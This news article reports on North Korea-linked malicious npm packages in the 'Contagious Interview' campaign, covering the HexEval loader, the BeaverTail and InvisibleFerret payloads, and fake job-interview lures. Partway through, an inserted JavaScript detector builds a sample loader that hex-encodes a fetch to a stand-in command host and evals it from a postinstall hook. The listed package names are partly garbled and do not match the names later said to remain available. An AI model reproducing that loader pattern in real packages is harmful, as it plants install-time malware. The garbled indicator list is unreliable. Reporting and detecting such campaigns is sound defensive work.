
Cybersecurity researchers have discovered fresh batches of malicious npm packages linked to the ongoing Contagious Interview operation, which originates from North Korea.
According to Socket, the ongoing supply chain attack involves 35 malicious packages uploaded from 24 npm accounts, which have been downloaded more than 4,000 times in total. The complete list of JavaScript libraries follows:
React-Plaid-sdk sumsub-node-websdk vite-plugin-next-refresh-plugin-purify nextjs-insight-insight-svgn-svgn node-loggers react-logs reactbootstrap test-topdev-logger-v1 test-topdev-logger-v3 server-log-engine logbin-nodejs vite-loader-svg struct-logger flexible – Logan beautiful plugin choke configuration Jsonpacks router pulse
Of these, six remain available for download from npm: react-plaid-sdk, sumsub-node-websdk, vite-plugin-next-refresh, vite-loader-svg, node-orm-mongoose, and router-parse.

Each identified npm package contains a hex-encoded loader called HexEval. It is designed to collect host information at install time and selectively deliver a follow-on payload responsible for dropping the known JavaScript stealer BeaverTail.
BeaverTail, in turn, is configured to download and run a Python backdoor called InvisibleFerret, allowing the threat actors to harvest sensitive data and establish remote control over infected hosts.
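To make the loader traits described above concrete, here is an added example (not code from Socket or the article) of a heuristic that flags an npm package combining an install-time lifecycle hook with a long hex literal that is decoded and passed to dynamic code execution; the package contents and the c2.invalid URL are constructed samples.

```javascript
// Added example: heuristic check for HexEval-style install-time loaders.
// Inputs are in-memory objects so the script runs offline; both packages
// below are constructed samples, not real registry contents.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const HEX_LITERAL = /(['"`])((?:[0-9a-fA-F]{2}){32,})\1/g; // >= 64 hex chars
const HEX_DECODE = /Buffer\.from\(\s*[^,]+,\s*['"]hex['"]\s*\)/;
const DYNAMIC_EXEC = /\b(eval|Function|vm\.runInThisContext)\s*\(/;

function assessPackage(pkg) {
  const findings = [];
  const scripts = pkg.packageJson.scripts || {};
  // Trait 1: code that runs automatically when the package is installed.
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push(`lifecycle hook "${hook}": ${scripts[hook]}`);
  }
  // Trait 2: large hex blobs, especially ones decoded and executed at runtime.
  for (const [name, src] of Object.entries(pkg.files)) {
    const blobs = [...src.matchAll(HEX_LITERAL)];
    if (blobs.length === 0) continue;
    const longest = Math.max(...blobs.map((m) => m[2].length));
    findings.push(`${name}: ${blobs.length} long hex literal(s), longest ${longest} chars`);
    if (HEX_DECODE.test(src) && DYNAMIC_EXEC.test(src)) {
      findings.push(`${name}: hex literal is decoded and passed to dynamic code execution`);
    }
  }
  const hasHook = findings.some((f) => f.startsWith('lifecycle hook'));
  const hasDecodeExec = findings.some((f) => f.includes('dynamic code execution'));
  const verdict = hasHook && hasDecodeExec ? 'block' : findings.length ? 'review' : 'clean';
  return { verdict, findings };
}

// Constructed sample shaped like the loader pattern the article describes.
const hexPayload = Buffer.from('fetch("https://c2.invalid/stage2")').toString('hex');
const suspicious = {
  packageJson: { name: 'example-logger', scripts: { postinstall: 'node index.js' } },
  files: { 'index.js': `const h="${hexPayload}";eval(Buffer.from(h,"hex").toString());` },
};
const benign = {
  packageJson: { name: 'example-util', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (a, b) => a + b;' },
};

console.log(assessPackage(suspicious)); // verdict: 'block'
console.log(assessPackage(benign));     // verdict: 'clean'
```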
“This nesting doll structure helps the campaign avoid basic static scanners and manual reviews,” said Socket researcher Kirill Boychenko. “One npm alias also ships a cross-platform keylogger package that captures all keystrokes, indicating the threat actors’ preparedness to tailor payloads for deeper surveillance when the target warrants it.”
Contagious Interview, first documented in late 2023 by Palo Alto Networks Unit 42, is an ongoing campaign conducted by North Korean state-sponsored threat actors to gain unauthorized access to developer systems with the aim of carrying out cryptocurrency and data theft.
This cluster is also widely tracked under the monikers CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, and Void Dokkaebi.
Recent iterations of the campaign have also been observed using ClickFix social engineering tactics to deliver malware such as GolangGhost and PylangGhost. A sub-cluster of this activity has been named ClickFake Interview.
The latest findings from Socket point to a multi-pronged approach in which Pyongyang-aligned threat actors lure prospective targets into installing malware under the pretext of job interviews and Zoom meetings.
The npm variant of Contagious Interview typically involves attackers approaching job seekers and developers with coding assignments, sharing links to malicious projects hosted on GitHub or Bitbucket.
“They target software engineers who are actively hunting for jobs and misuse the trust that job seekers usually place in recruiters,” says Boychenko. “Fake personas often open communication with scripted outreach messages and persuasive job descriptions.”

The victims are then asked to clone and run these projects outside of a containerized environment as part of the interview process.
“This malicious campaign highlights the evolving tradecraft behind North Korea’s supply chain attacks, blending malware staging, OSINT-led targeting and social engineering to compromise developers through trusted ecosystems,” Socket said.
“By embedding malware loaders like HexEval in open source packages and pairing them with fake job assignments, the threat actors bypass perimeter defenses and gain execution on the target developer’s system. The campaign’s multi-stage structure, minimal on-registry footprint, and efforts to steer victims away from containerized environments are all attempts to evade detection.”